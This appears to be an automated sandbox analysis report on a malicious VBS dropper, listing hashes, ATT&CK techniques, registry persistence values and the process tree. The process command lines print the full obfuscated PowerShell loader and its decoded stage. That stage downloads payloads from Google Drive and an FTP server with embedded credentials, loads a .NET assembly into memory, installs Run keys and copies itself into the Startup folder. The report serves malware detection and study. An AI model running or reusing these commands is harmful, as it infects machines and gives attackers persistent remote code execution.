c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f

Analysis

max time kernel
134s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-11-2024 23:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

demeOnay.vbs
Size

586KB
MD5

dbc2b2c1ad1e78348f9336869fbf0740
SHA1

7903a4142cb3c3e588710691a8577e5b7ee3c6c6
SHA256

c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f
SHA512

b4751bcaa288a9f0c74e7fac9bd7e9dc74422c71694300debdefebdc42bc077016bb07b2d928be4eb4d9cb16b18e744be35c82d2e2a53a7a0c290692772b94b2
SSDEEP

1536:coooooooooooooooooC99999999999999999999999999999999999999999999/:v3Jg6azbLal3Jg6azbLal3Jg6azbLaO

Score

10^/10

defense_evasion discovery execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
14	4028	powershell.exe
25	4028	powershell.exe
27	2580	powershell.exe
33	4028	powershell.exe
34	4028	powershell.exe
36	4028	powershell.exe
38	4028	powershell.exe
40	4780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1276	powershell.exe
3408	powershell.exe
4324	powershell.exe
4780	powershell.exe
524	powershell.exe
3604	powershell.exe
4028	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ecb = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\cjksu.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_ziy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\cjksu.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	pastebin.com
40	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1692	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1692	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3604	powershell.exe
3604	powershell.exe
4028	powershell.exe
4028	powershell.exe
2580	powershell.exe
2580	powershell.exe
2580	powershell.exe
3408	powershell.exe
1276	powershell.exe
3408	powershell.exe
1276	powershell.exe
3408	powershell.exe
1276	powershell.exe
524	powershell.exe
524	powershell.exe
524	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4780	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4100 wrote to memory of 3604	4100	WScript.exe	85
PID 4100 wrote to memory of 3604	4100	WScript.exe	85
PID 3604 wrote to memory of 4028	3604	powershell.exe	88
PID 3604 wrote to memory of 4028	3604	powershell.exe	88
PID 4028 wrote to memory of 3196	4028	powershell.exe	95
PID 4028 wrote to memory of 3196	4028	powershell.exe	95
PID 4028 wrote to memory of 1692	4028	powershell.exe	96
PID 4028 wrote to memory of 1692	4028	powershell.exe	96
PID 4028 wrote to memory of 2580	4028	powershell.exe	99
PID 4028 wrote to memory of 2580	4028	powershell.exe	99
PID 4028 wrote to memory of 3408	4028	powershell.exe	105
PID 4028 wrote to memory of 3408	4028	powershell.exe	105
PID 4028 wrote to memory of 1276	4028	powershell.exe	106
PID 4028 wrote to memory of 1276	4028	powershell.exe	106
PID 4028 wrote to memory of 3048	4028	powershell.exe	107
PID 4028 wrote to memory of 3048	4028	powershell.exe	107
PID 4028 wrote to memory of 524	4028	powershell.exe	109
PID 4028 wrote to memory of 524	4028	powershell.exe	109
PID 4028 wrote to memory of 4324	4028	powershell.exe	110
PID 4028 wrote to memory of 4324	4028	powershell.exe	110
PID 4028 wrote to memory of 4780	4028	powershell.exe	111
PID 4028 wrote to memory of 4780	4028	powershell.exe	111
PID 4028 wrote to memory of 1176	4028	powershell.exe	112
PID 4028 wrote to memory of 1176	4028	powershell.exe	112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'lAGwAZQ' + [char]66 + 'jAHQAag' + [char]66 + 'pAG0AaA' + [char]66 + 'lAG4AZA' + [char]66 + 'lAHIAcw' + [char]66 + 'vAG4ALg' + [char]66 + 'jAG8AbQAvAHoALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAIAArACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACcASQ' + [char]66 + 'WAEYAcg' + [char]66 + 'wACcAIAA9ACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAOwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAOwAnAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEcAaQ' + [char]66 + 'UAHoASgAkADsAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIAA9ACAAbw' + [char]66 + 'UAFIAaA' + [char]66 + 'YACQAOwApACAAKQAnAEEAJwAsACcAkyE6AJMhJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'mAGIAcg' + [char]66 + 'zAG0AJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACAAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAGYAYg' + [char]66 + 'yAHMAbQAkADsAIAAgAH0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + '0AHAAaw' + [char]66 + 'mAHkAJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwAgACkAIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAdA' + [char]66 + 'wAGsAZg' + [char]66 + '5ACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJA' + [char]66 + '7ACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIAAxAC4AMAAuADAALgA3ADIAMQAgAGcAbg' + [char]66 + 'pAHAAOwAgAGMALwAgAGUAeA' + [char]66 + 'lAC4AZA' + [char]66 + 'tAGMAOw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + 'oAGYAZA' + [char]66 + 'wAG4AJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwApACkAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAtACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'GAC0AIA' + [char]66 + '0AHgAZQ' + [char]66 + 'UAG4AaQ' + [char]66 + 'hAGwAUA' + [char]66 + 'zAEEALQAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGUAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC0Abw' + [char]66 + 'UAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMAKAAgACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAFMAUAAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAGgAZg' + [char]66 + 'kAHAAbgAkADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIAbA' + [char]66 + 'wAGsAdAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAAPQAgAEIAbA' + [char]66 + 'wAGsAdAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAALA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Acw' + [char]66 + '4AHYAZA' + [char]66 + '5ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHMAeA' + [char]66 + '2AGQAeQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHMAeA' + [char]66 + '2AGQAeQAkADsAfQA7ACAAKQAnAHQATw' + [char]66 + 'MAGMAXw' + [char]66 + 'LAGEAMw' + [char]66 + 'aAGYAbw' + [char]66 + 'YADIASg' + [char]66 + 'KAHIAVg' + [char]66 + 'oAG0AVgA5AGMAbQA5AFgAcw' + [char]66 + '1AFgAbQ' + [char]66 + 'qADEAZwAxACcAIAArACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAMgA0AHUAWA' + [char]66 + 'KAFQAcQ' + [char]66 + 'hAG0AZw' + [char]66 + '5AE0AdA' + [char]66 + 'GAHoAYQ' + [char]66 + 'rAFAAUgAxAHEAXw' + [char]66 + 'JAHYARw' + [char]66 + 'pAFgATg' + [char]66 + 'kAHEAYQ' + [char]66 + 'OADEAJwAgACsAIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoACAAPQAgAHcAdw' + [char]66 + 'zAGcAZwAkAHsAIAApACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHUAbw' + [char]66 + 'XAFoAVAAkAHsAIAApACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAA7AA==';$nqqkv = $qKKzc; ;$nqqkv = $qKKzc.replace('уЦϚ' , 'B') ;;$zmmdr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nqqkv ) ); $zmmdr = $zmmdr[-1..-$zmmdr.Length] -join '';$zmmdr = $zmmdr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs');powershell $zmmdr
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ggsww = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ggsww = ($ggsww + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ggsww = ($ggsww + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$ydvxs = (New-Object Net.WebClient);$ydvxs.Encoding = [System.Text.Encoding]::UTF8;$ydvxs.DownloadFile($ggsww, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$npdfh = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $npdfh -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$yfkpt = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $yfkpt -OutFile $obTxq -UseBasicParsing } ;$msrbf = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $msrbf.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4028
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:3196
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
